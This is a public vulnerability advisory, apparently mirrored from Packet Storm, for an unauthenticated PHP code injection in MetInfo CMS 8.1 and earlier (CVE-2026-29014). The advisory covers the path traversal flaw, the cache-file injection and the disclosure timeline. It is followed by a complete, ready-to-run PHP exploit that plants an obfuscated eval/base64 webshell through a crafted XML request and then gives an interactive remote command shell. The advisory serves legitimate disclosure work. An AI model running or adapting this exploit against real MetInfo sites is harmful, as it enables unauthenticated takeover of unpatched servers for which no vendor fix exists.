Share
## https://sploitus.com/exploit?id=PACKETSTORM:218222
---------------------------------------------------------------------------
    MetInfo CMS <= 8.1 (weixinreply.class.php) PHP Code Injection Vulnerability
    ---------------------------------------------------------------------------
    
    
    [-] Software Link:
    
    https://www.metinfo.cn
    
    
    [-] Affected Versions:
    
    Versions 7.9, 8.0, and 8.1.
    
    
    [-] Vulnerability Description:
    
    The vulnerable code is located into the
    /app/system/weixin/include/class/weixinreply.class.php script.
    
    Specifically, within the weixinreply::wxAdminLogin() method:
    
    149.     public function wxAdminLogin($data = array(),$code = '')
    150.     {
    151.         global $_M;
    152.         $weixinapi = load::mod_class('weixin/weixinapi','new');
    153.         $login_code = cache::get("weixin/".$code);
    154.          if ($login_code) {
    155.             cache::put("weixin/".$login_code,$data['FromUserName']);
    156.          }
    157.         return;
    158.     }
    
    User input passed through the "EventKey" and "FromUserName" XML tags
    from the HTTP request body when dispatching weixin API requests is not
    properly sanitized before being used in a call to the cache::get() and
    cache::put() methods respectively.
    
    Specifically, the $code parameter may include Path Traversal
    sequences, making the cache::get() method into including arbitrary PHP
    files. This can be abused to set the $login_code variable to the
    "Array" string by including an arbitrary cache file. Subsequently, the
    cache::put() method will write the "FromUserName" parameter into the
    /cache/weixin/Array.php file, embedding it within double quotes:
    
    30.     public static function put($file, $data, $type = 'php')
    31.     {
    32.         global $_M;
    33.
    34.         load::sys_func('file');
    35.         $save = PATH_CACHE . $file . '.' . $type;
    36.         makefile($save);
    37.         #$data = str_replace(array("\"", "\\"), array("\\\"",
    "\\\\"), $data);
    38.         if (!is_array($data)) {
    39.             file_put_contents($save, "<?php\ndefined('IN_MET') or
    exit('No permission');\n\$cache=\"{$data}\";\n?>");
    40.         } else {
    41.             $info = var_export($data, true);
    42.             $info = "<?php\ndefined('IN_MET') or exit('No
    permission');\n\$cache = {$info};\n?>";
    43.             file_put_contents($save, $info);
    44.         }
    45.     }
    
    This can be exploited by remote, unauthenticated attackers to inject
    and execute arbitrary PHP code by abusing PHP's complex curly syntax,
    leading to unauthenticated Remote Code Execution (RCE).
    
    NOTE: when MetInfo is running on non-Windows servers, successful
    exploitation of this vulnerability requires the /cache/weixin/
    directory to exist, which is created when installing and configuring
    the official WeChat plugin.
    
    
    [-] Proof of Concept:
    
    https://karmainsecurity.com/pocs/CVE-2026-29014.php
    
    
    [-] Solution:
    
    No official solution is currently available.
    
    
    [-] Disclosure Timeline:
    
    [26/02/2026] - Vendor contacted through several @metinfo.cn and
    @mituo.cn email addresses, no response
    
    [07/03/2026] - Tried to reach out to the vendor again, no response
    
    [28/03/2026] - Tried to reach out to the vendor once again, no response
    
    [29/03/2026] - Tried to reach out to the vendor through Weibo, no response
    
    [30/03/2026] - CVE identifier requested
    
    [31/03/2026] - CVE identifier assigned
    
    [01/04/2026] - Public disclosure
    
    
    [-] CVE Reference:
    
    CVE-2026-29014 has been assigned to this vulnerability.
    
    
    [-] Credits:
    
    Vulnerability discovered by Egidio Romano.
    
    
    [-] Original Advisory:
    
    https://karmainsecurity.com/KIS-2026-06
    
    
    --- packet storm attached poc below: ---
    
    <?php
    
    /*
        ---------------------------------------------------------------------------
        MetInfo CMS <= 8.1 (weixinreply.class.php) PHP Code Injection Vulnerability
        ---------------------------------------------------------------------------
        
        author..............: Egidio Romano aka EgiX
        mail................: n0b0d13s[at]gmail[dot]com
        software link.......: https://www.metinfo.cn
        
        +-------------------------------------------------------------------------+
        | This proof of concept code was written for educational purpose only.    |
        | Use it at your own risk. Author will be not responsible for any damage. |
        +-------------------------------------------------------------------------+
        
        [-] Original Advisory:
    
        https://karmainsecurity.com/KIS-2026-06
    */
    
    set_time_limit(0);
    error_reporting(E_ERROR);
    
    print "\n+----------------------------------------------------------+";
    print "\n| MetInfo CMS <= 8.1 Remote Code Execution Exploit by EgiX |";
    print "\n+----------------------------------------------------------+\n";
    
    if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
    
    if ($argc != 2) die("\nUsage: php {$argv[0]} <URL>\n\n");
    
    $ch = curl_init();
    
    curl_setopt($ch, CURLOPT_URL, "{$argv[1]}app/system/entrance.php?n=include&m=module&c=weixin&a=doapi");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    //curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080");
    
    print "\n[+] Injecting PHP webshell\n";
    
    $payload = '<x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&#x26;../config/tables</EventKey><FromUserName>{${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)]))}}.{${die()}}</FromUserName></x>';
    
    curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
    
    if (!preg_match("/success/", curl_exec($ch))) die("[-] Injection failed!\n\n");
    
    print "[+] Launching webshell\n";
    
    $phpcode = "chdir('../..'); print '_____'; passthru(base64_decode('%s')); print '_____';";
    $payload = '<x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&#x26;Array</EventKey></x>';
    
    curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
    
    while(1)
    {
        print "\nmetinfo-shell# ";
        if (($cmd = trim(fgets(STDIN))) == "exit") break;
        curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
        preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
    }